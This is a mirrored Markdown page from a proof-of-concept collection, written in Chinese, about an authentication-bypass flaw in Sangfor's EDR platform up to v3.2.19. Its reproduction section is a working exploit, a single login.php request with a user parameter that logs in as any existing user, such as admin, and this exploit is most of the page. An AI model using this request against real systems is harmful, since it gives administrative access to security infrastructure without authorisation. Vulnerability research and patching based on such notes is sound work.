admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/深信服 EDR 后台任意用户登陆漏洞.md

21 lines
429 B
Markdown
Raw Normal View History

Web应用漏洞
2022-05-17 17:43:20 +08:00
# 深信服 EDR 后台任意用户登陆漏洞
## 漏洞描述
深信服终端检测响应平台是深信服公司开发的一套EDR系统。攻击者利用该漏洞登录任意用户
## 影响版本
```
EDR <= v3.2.19
```
## 漏洞复现
https://xxx.xxx.xxx.xxx/ui/login.php?user=admin
注意最后的admin需要为存在的用户名
![img](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202091912509.png)
Reference in New Issue Copy Permalink